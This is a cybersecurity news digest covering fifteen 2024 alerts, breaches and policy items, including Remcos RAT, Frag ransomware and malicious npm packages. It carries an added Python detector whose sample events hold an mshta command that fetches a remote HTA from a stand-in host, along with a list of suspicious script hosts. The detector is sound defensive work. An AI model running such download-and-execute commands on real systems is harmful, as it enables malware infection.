What's happening in cybersecurity today?
Cyber Alerts
1. Fileless Remcos RAT Spread via Excel Exploit
Cybersecurity experts have identified a new phishing campaign that spreads a fileless variant of the Remcos RAT malware, leveraging an Excel exploit to compromise victims' systems. The attack begins with a purchase order-themed phishing email containing a malicious Excel attachment. Once opened, the document exploits a known Microsoft Office vulnerability (CVE-2017-0199) to download an HTML Application (HTA) file, launching it via mshta.exe.
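The chain described above leaves a recognisable trace in endpoint telemetry: an Office process becoming the direct parent of mshta.exe, often with a remote URL on its command line. The following detection logic is an added example, not code from the original digest or from the researchers cited; it runs over constructed, simplified Sysmon-style process-creation records and also widens the parent/child rule to other script hosts an Office document has no normal reason to spawn.

```python
import json
from pathlib import PureWindowsPath

# Constructed sample process-creation events in a simplified Sysmon Event ID 1 shape.
# These are illustrative records, not telemetry from the campaign described above.
SAMPLE_EVENTS = r"""
{"id": 1, "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "image": "C:\\Windows\\System32\\mshta.exe", "command_line": "mshta.exe http://payload.example/order.hta"}
{"id": 2, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "command_line": "EXCEL.EXE C:\\Users\\u\\Downloads\\PO-4471.xls"}
{"id": 3, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\mshta.exe", "command_line": "mshta.exe C:\\Users\\u\\tools\\dashboard.hta"}
{"id": 4, "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe /c whoami"}
"""

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# mshta.exe is the launcher named in the alert; the other entries generalise the rule
# to script/command hosts that an Office document should never spawn in normal use.
SUSPICIOUS_CHILDREN = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return PureWindowsPath(path).name.lower()


def office_spawned_script_host(event: dict) -> bool:
    """True when an Office application is the direct parent of a script/command host."""
    return (basename(event["parent_image"]) in OFFICE_PARENTS
            and basename(event["image"]) in SUSPICIOUS_CHILDREN)


def remote_hta_argument(event: dict) -> bool:
    """True when mshta.exe is pointed at a remote URL, the pattern the alert describes."""
    cmd = event["command_line"].lower()
    return basename(event["image"]) == "mshta.exe" and ("http://" in cmd or "https://" in cmd)


def scan(events_text: str) -> list:
    """Return (event id, severity) for every event that matches either rule."""
    findings = []
    for line in events_text.strip().splitlines():
        ev = json.loads(line)
        if office_spawned_script_host(ev):
            # Office parent plus a remote HTA is the full chain from the alert.
            findings.append((ev["id"], "high" if remote_hta_argument(ev) else "medium"))
        elif remote_hta_argument(ev):
            findings.append((ev["id"], "medium"))
    return findings


if __name__ == "__main__":
    for event_id, severity in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {severity}")
```

Event 3 (mshta.exe launched from Explorer with a local file) is deliberately left unflagged to show the rule's scope; tune the child list to your own baseline before deploying it.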
2. Veeam Flaw Used to Spread Frag Ransomware
Cybercriminals are exploiting a critical vulnerability in Veeam Backup & Replication software (CVE-2024-40711) to deploy a new ransomware strain named "Frag." This remote code execution flaw, rated 9.8 in severity, allows attackers to create unauthorized administrator accounts and execute ransomware on compromised networks. Sophos X-Ops researchers report that a threat group, STAC 5881, is using compromised VPN appliances for initial access before leveraging the Veeam vulnerability.
3. Microsoft Bookings Flaw Allows Impersonation
A critical security vulnerability in Microsoft Bookings has been discovered, allowing attackers to create unauthorized Entra (formerly Azure AD) accounts and impersonate legitimate users within organizations using Microsoft 365 services. The flaw, found in the "Shared Booking Pages" feature, enables attackers to generate fully functional accounts without administrative permissions by simply creating a shared Booking page. This exploitation can lead to significant security risks, including the ability to bypass impersonation filters, reset passwords for external services, and establish hidden mailboxes for phishing attacks or email interception.
4. New njRAT Malware Variant Found in the Wild
Mr.Skeleton is a newly discovered Remote Access Trojan (RAT) that has been spotted in the wild and is based on the well-known njRAT (Ratenjay) malware family. Recently advertised for sale on dark web platforms, this variant boasts a range of malicious capabilities including remote access to infected systems, file and registry manipulation, desktop control, keylogging, and remote control of the device's camera.
5. Malicious NPM Packages Target Roblox Users
A recent cybersecurity campaign has targeted the npm package repository with malicious JavaScript libraries designed to infect Roblox users with data-stealing malware, including Skuld and Blank-Grabber. The rogue packages, such as "node-dlls" and "rolimons-api," were crafted to deceive developers by masquerading as legitimate libraries. These packages contain obfuscated code that downloads and executes malware, harvesting sensitive information from infected systems and exfiltrating the data via Discord webhook or Telegram.
Cyber Incidents
6. Set Forth Breach Exposes 1.5 Million Users
Set Forth, Inc., a company offering debt relief services, has disclosed a significant data breach affecting 1.5 million individuals, including over 3,000 residents of Maine. The breach, which was identified on May 21, 2024, compromised sensitive personal information such as names, Social Security numbers, addresses, and dates of birth. While Set Forth has stated there is no evidence of misuse of the data, the company is offering identity theft protection services and has implemented enhanced security measures to prevent future incidents.
7. DeltaPrime Exploited for $4.8 Million
The DeltaPrime DeFi liquidity protocol has been exploited for approximately $4.8 million in digital assets, primarily ARB and AVAX tokens, in a breach still under investigation. The attack began when the exploiter contributed liquidity to the protocol, which was confirmed by on-chain intelligence firm PeckShield. In response, the DeltaPrime team paused operations on both the Arbitrum and Avalanche blockchains to investigate the incident further.
8. Attack Disrupts Israeli Credit Card Readers
A suspected cyberattack disrupted credit card readers at gas stations and supermarkets across Israel on November 10, 2024, causing widespread malfunctioning. The company responsible for the readers' cybersecurity, Hyp Credit Guard, confirmed that the issue was likely caused by a distributed denial-of-service (DDoS) attack targeting communication providers. The attack caused an hour-long crash but was quickly mitigated, with services restored shortly after.
9. Cyberattack Disrupts Hautes-Pyrénées Systems
A cyberattack has disrupted the messaging system of France's Hautes-Pyrénées Department since Thursday morning, prompting officials to advise users to contact services via phone or the online messaging platform. Pascal Saurel, the general director of services, confirmed the attack was isolated to the messaging system and assured that the department's cybersecurity measures enabled the rapid identification of the issue. Saurel emphasized that there was no ransom demand or threat to sensitive data.
10. Space Bears Group Breaches Mongolian Hospital
The Space Bears hacking group has reportedly breached Intermed Hospital, exfiltrating sensitive data, including databases and personal information. In a statement issued by the group, they claimed responsibility for the attack and set a ransom deadline for November 15, 2024. The hospital is working to assess the scope of the breach and secure affected systems. This cyberattack highlights the growing threat to healthcare institutions and their vulnerability to cybercrime.
Cyber News
11. New Security Rules Proposed for Transport
The Transportation Security Administration (TSA) has proposed new regulations aimed at strengthening cybersecurity within the U.S. surface transportation sector, including pipelines and railroads. These rules would formalize previous directives issued after the 2021 Colonial Pipeline ransomware attack and require affected companies to implement comprehensive cyber risk management plans. Key elements of the plans include annual cybersecurity evaluations, assessments for vulnerabilities, and operational measures to prevent, detect, and recover from cyber incidents.
12. Nigeria and UK Partner to Combat Cybercrime
Nigeria and the United Kingdom have formed a strategic partnership aimed at combating rising cybercrime and strengthening digital security. This collaboration was highlighted during a high-level roundtable meeting in Abuja, where industry leaders from both nations discussed strategies to address cyber threats. The partnership, led by Kashifu Inuwa, Director-General of Nigeria's National Information Technology Development Agency, focuses on enhancing Nigeria's cyber resilience to support national security and economic growth.
13. Entrust to Stop Operating as a Trusted Certificate Authority
Entrust, a prominent certificate authority (CA), will soon stop operating as a trusted CA due to persistent security and operational concerns, according to recent announcements from Google and Mozilla. Following years of troubling incidents, including failures in incident handling and compliance with CA/Browser Forum rules, browser makers have decided to revoke trust in Entrust's newly issued digital certificates. The decision affects all new certificates issued by Entrust, with existing certificates remaining valid until their expiration.
14. Bitcoin Fog Founder Sentenced for 12 Years
Roman Sterlingov, the founder of the Bitcoin Fog cryptocurrency mixer, has been sentenced to 12 years and six months in prison for his role in laundering over $400 million in illicit funds between 2011 and 2021. The U.S. Department of Justice revealed that Bitcoin Fog was one of the darknet's longest-running mixers, enabling cybercriminals to hide the origin of their proceeds, primarily from illegal activities such as drug trafficking, identity theft, and child exploitation. In addition to his prison sentence, Sterlingov must forfeit $395.56 million in assets and his stake in the Bitcoin Fog wallet, which holds over $100 million in bitcoin.
15. Malwarebytes Acquires AzireVPN for Privacy
Malwarebytes, a leading cybersecurity firm, has acquired AzireVPN, a Swedish privacy-focused VPN provider. This acquisition aims to enhance Malwarebytes' product offerings by integrating AzireVPN's advanced technologies, particularly its Blind Operator tool, which ensures the security of user traffic by disabling remote and local server access. AzireVPN is renowned for its strong commitment to privacy, with a focus on preventing unauthorized access and traffic interception.
Copyright © 2024 CyberMaterial. All Rights Reserved.